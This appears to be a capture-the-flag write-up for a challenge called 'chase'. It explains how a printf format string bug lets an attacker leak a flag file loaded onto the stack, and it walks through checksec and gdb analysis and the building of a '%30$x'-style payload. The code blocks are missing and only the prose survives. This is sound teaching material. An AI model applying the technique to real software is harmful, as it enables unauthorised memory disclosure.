chase
Leaking data off the stack using format strings.
Last updated
Leaking data off the stack using format strings.
Last updated
This is an exciting binary. It has no canary and no PIE, but it has a secure call to fgets()
, meaning we still can't truly stack smash. What can we do?
We first notice that it does nothing when we try to run the program. We'll notice later that this is because the binary ensures that a file called flag.txt is sitting in the same directory; otherwise, it will stop execution. We can create a dummy file to get around this. I use the same flag every time:
This loads in flag{temporary_flag}
into the flag file. I use this (1) because it's sufficiently long and looks like a flag I might see, and (2) because it has the flag braces so I can easily find it in memory.
With that out of the way, we can now run the binary. It asks for some input and prints it back to us. Let's dive deeper and check for vulnerable code.
We can use checksec
to see what protections are enabled on the binary:
As expected, there's nothing super shocking here. No canary, PIE disabled, NX enabled. Shellcode is off the table, but buffer overflows aren't yet.
Checking gdb
, we make the following observations:
The only function that seems to be made by the user is main()
.
main()
calls several interesting functions. The most important of these are fopen()
, fgets()
, puts()
, and printf()
.
There is a call to exit()
, but we can assume, based on earlier findings, that this is because the binary checks for the flag file's existence.
Let's try and break this code and reassemble what the C code might look like.
Our first significant call is to fopen()
. Based on the man
pages, we know that fopen()
takes two arguments:
The path name of the file to open
The mode to open the file (typically read/write, bytes/chars, etc.)
Using gdb
, we can check the arguments:
gdb
's GEF will predict the arguments for us:
If we didn't have GEF, we could check the stack:
fopen()
returns a FILE*
, which is eventually stored on the stack at ebp-0xc
. There's a check afterward to make sure that its value is not NULL
, but we can ignore that for now.
The next call is to fgets()
. We can check the arguments in the same way:
This isn't super helpful to us. We know that fgets()
takes three arguments:
The buffer to read into (in this case, 0xf7ffda40
)
The number of bytes to read (in this case, 0x64
or 100 bytes)
The file to read from (in this case, 0x0804d1a0
)
The first and third ones make little sense until we check the assembly.
The first parameter is the address of ebp-0x70
, which is where we are writing. The second argument is clearly 0x64
. The third argument is the value at ebp-0xc
, which is the FILE*
from fopen()
.
What does this mean?
This tells us that we're reading 100 bytes from the file into the buffer at ebp-0x70
.
None of the puts()
calls are really important to us, so we're going to skip those. Then we reach fgets()
.
The first argument is the address of ebp-0xd4
, which is where we are writing. The second argument is clearly 0x64
. The third argument is the value at ebx-0x4
.
We see that the third argument is stdin
, which makes sense because we've been looking for a function that takes keyboard input.
Last, we see that there is a call to printf()
. We can check the arguments in the same way:
We see that the string that we read from is being passed to printf
. This is the format string bug because the string is being directly passed into printf
.
Based on all this information, we can reassemble the C code (at least the important parts):
We know that the flag is being loaded on the stack. It's our job to use the format string bug to find where it is. Without gdb
, this would be a very annoying challenge.
Why?
You can answer this question by running it. After a certain number of format strings, you'll start to print your own input from the buffer. This makes it hard to decipher what's going on.
We can use gdb
to find the flag. If we put the instruction pointer right before the fgets()
call that takes from stdin
, we can see what's on the stack when we enter the format strings.
Here's why we use flag{temporary_flag}
as the contents of flag.txt. flag
in hex is 0x67616c66
. We see that it starts at 0xffffd568
, which we can verify:
We count that this starts at the 30th word on the stack. We can verify this using the format specifier in our input:
We count that the flag is from words 30
to 36
.
Rather than doing this manually, we want to process the data to print out the flag easily. Let's see what this looks like.
The first thing we want to do is build the payload. Rather than typing it manually, we can use format strings to build it for us.
This code cycles from idx=30
to idx=36
(because range
doesn't include the last number). It then uses a format string to put the index in the right place (e.g. %30$x
). Because format strings aren't supported in byte strings, we have to use .encode()
to convert the string to bytes. Then, we append it to our payload.
Next, we send off the payload and receive the data:
Now, we need to process the data. Let's do this one step at a time
We know the data is in word-sized chunks, delimited by spaces.
The chunks represent four bytes, meaning that for each two-character chunk, we need to convert this to a byte.
Each chunk is in little-endian, meaning once we have the bytes, we need to reverse them.
This will print our flag! We can do this entire process in one big step:
Let's think about it:
For each item in the split data (i.e. data_arr
), it's using binascii.unhexlify
to convert the data from a hex to a byte string.
From there, we are reversing the data (i.e. [::-1]
) and converting it to a string (i.e. .decode()
).
Finally, we are printing the data without a newline (i.e. end=''
). This way, we don't even have to store the data and then worry about using ''.join()
.
Here is the full exploit: